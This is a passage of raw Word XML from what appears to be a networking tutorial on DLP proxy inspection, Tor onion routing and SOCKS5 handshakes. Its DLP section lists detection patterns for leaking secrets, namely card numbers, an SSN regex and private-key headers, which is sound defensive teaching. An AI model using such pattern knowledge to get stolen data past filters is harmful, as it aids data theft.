    <w:p w14:paraId="035321C1" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>The DLP proxy reads the full request body (not just headers and URL) and applies patterns:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27429C11" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="565"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Credit card numbers: Luhn-validated 13–19 digit sequences matching major card patterns.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4169FF6F" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="565"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Social Security Numbers: \d{3}-\d{2}-\d{4} format with validation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A792C34" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="565"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Private keys: -----BEGIN RSA PRIVATE KEY----- patterns.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35A1896E" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="565"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Custom patterns: Proprietary document formats, internal project names, classified document identifiers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1121FFD4" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The TLS inspection dependency:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> DLP for HTTPS traffic requires SSL interception (described above). Without decrypting the traffic, the DLP proxy only sees destination hostname and traffic volume — not the content.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60602AB3" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The performance challenge:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Deep content inspection of every HTTP body is CPU-intensive. Large file uploads (100MB+) require buffering the entire body before inspection can complete — adding latency and memory pressure. Optimizations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64530831" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="566"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Streaming inspection:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Scan data in chunks as it arrives, without waiting for the complete body. Some patterns require the full body (to detect files), but many patterns can be detected in the first few KB.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="606E209B" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="566"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>File type identification:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Identify the file type from the first few bytes (magic bytes). Apply type-appropriate inspection rules (PDF inspection vs plain text inspection differ significantly).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BE5CE38" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="566"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Sampling:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Inspect a statistical sample of traffic (e.g., 10%) rather than 100% — reduces load but may miss individual violations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A253A79" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Anonymizing Proxy — Tor's Onion Routing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4140FED0" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>The </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Tor network</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> is the most sophisticated anonymizing proxy system. It goes far beyond simple forward proxying (which hides the client's IP from the destination but the proxy operator still knows the client's IP and destination).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="757C36A5" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Onion routing mechanics:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="394943EA" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="567"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Circuit construction:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> The Tor client downloads a list of Tor relays from directory servers. It selects 3 relays: Guard node (entry), Middle node, Exit node. It establishes an encrypted tunnel to the guard, then extends the tunnel through the guard to the middle, then extends through the middle to the exit — using incremental key negotiation (Diffie-Hellman at each hop).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ABF381B" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="567"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Layered encryption:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> The message is encrypted in </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>three layers</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t>, like onion layers:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24D84451" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17C1AF78" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Encrypt with Exit's key [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C75527A" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t xml:space="preserve">  Encrypt with Middle's key [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BEA01E4" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t xml:space="preserve">    Encrypt with Guard's key [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B574D24" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t xml:space="preserve">      Original HTTP request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F37123A" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t xml:space="preserve">    ]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EC32517" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t xml:space="preserve">  ]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F72E476" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15B33526" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="568"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Traffic forwarding:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="170AA1B6" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="568"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Client sends the triple-encrypted data to the Guard node.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DEA91B8" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="568"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Guard decrypts its layer (revealing the Middle node's address and the double-encrypted data). Forwards to Middle.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AE50812" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="568"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Middle decrypts its layer (revealing the Exit node's address and the single-encrypted data). Forwards to Exit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F739EA3" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="568"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Exit decrypts its layer (revealing the original HTTP request). Forwards to the destination.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5199B60B" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="568"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>No single node has full knowledge:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10E9B43E" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="568"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Guard knows: client's real IP, that traffic is going to Middle. Does NOT know: the destination.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70B465BE" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="568"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Middle knows: traffic came from Guard, going to Exit. Does NOT know: client's IP or destination.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53B02534" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="568"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Exit knows: traffic going to destination. Does NOT know: client's IP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27902D69" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>The global passive adversary problem:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> An adversary that can observe all network traffic globally (NSA-level) can perform </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>traffic correlation</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> — watching traffic enter the Tor network from a client and watching traffic exit toward the destination. Timing correlation can link the entry and exit flows even though the content is encrypted and routed through 3 hops. This is the fundamental limitation of onion routing against state-level adversaries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="612ACFBD" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Hidden services (.onion addresses):</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Tor hidden services allow servers to run without revealing their IP addresses. The server and client both connect to a </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>rendezvous point</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> (a Tor relay they both agree on) — neither the client nor the server knows the other's IP address. The .onion address is the server's public key — the address IS the cryptographic identity. No DNS lookup required.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42706126" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:pict w14:anchorId="6399C066">
          <v:rect id="_x0000_i3060" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C4BC053" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>9. Proxy Protocol Deep Dives — SOCKS and HTTP CONNECT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="311E21F8" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SOCKS Protocol — Generic TCP/UDP Proxying</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C09FDA2" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>HTTP proxies only handle HTTP traffic. </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SOCKS (SOCKet Secure)</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> is a general-purpose proxy protocol that handles </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>any TCP (and in SOCKS5, UDP) traffic</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> — arbitrary protocols, not just HTTP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5654282F" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SOCKS5 connection establishment:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7596887C" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="569"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Client sends authentication negotiation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AFEEF17" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11270A84" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>VER=0x05  NMETHODS=0x02  METHODS=[0x00 (no auth), 0x02 (username/password)]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21CB3688" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="570"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Server selects authentication method:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BF7CB50" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C3F6F9D" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>VER=0x05  METHOD=0x02  (username/password selected)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68A9B2AC" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="571"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Client sends credentials:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51386C1E" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C98897F" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>VER=0x01  ULEN=&lt;len&gt;  UNAME=&lt;username&gt;  PLEN=&lt;len&gt;  PASSWD=&lt;password&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02DFBBBC" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="572"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Server responds with auth status:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C31D2AB" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E6BCCE0" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>VER=0x01  STATUS=0x00  (success)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="089FADA8" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="573"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Client sends connection request:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70D5B84E" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="520C83F8" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>VER=0x05  CMD=0x01 (CONNECT)  RSV=0x00  ATYP=0x03 (domain name)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="452F8FD8" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>DST.ADDR=&lt;domain_length&gt;&lt;domain&gt;  DST.PORT=&lt;port&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CAE27A3" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="574"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Server connects to destination and responds:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50336DB5" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60049C42" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>VER=0x05  REP=0x00 (success)  RSV=0x00  ATYP  BND.ADDR  BND.PORT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BEB7236" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="575"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>TCP tunnel established.</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Client and destination communicate directly through the SOCKS proxy — the proxy forwards bytes bidirectionally without understanding the application protocol.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02893A1E" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SOCKS5 DNS resolution — the privacy issue:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="658742B9" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>SOCKS5 supports two modes for DNS:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1117AB66" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="576"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Client resolves DNS locally</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> (ATYP=0x01 IPv4 or 0x04 IPv6): Client sends the resolved IP. The proxy's DNS resolver is bypassed. </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>DNS leaks</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> — the client's local DNS resolver (potentially the ISP) sees the query, defeating anonymization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="541719A8" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="576"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Proxy resolves DNS</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> (ATYP=0x03 domain name): Client sends the domain name, proxy resolves it. No DNS leak. Required for proper anonymization. Tor always uses proxy-side DNS resolution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15402550" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SOCKS vs HTTP CONNECT:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblCellMar>
          <w:top w:w="15" w:type="dxa"/>
          <w:left w:w="15" w:type="dxa"/>
          <w:bottom w:w="15" w:type="dxa"/>
          <w:right w:w="15" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2271"/>
        <w:gridCol w:w="3243"/>
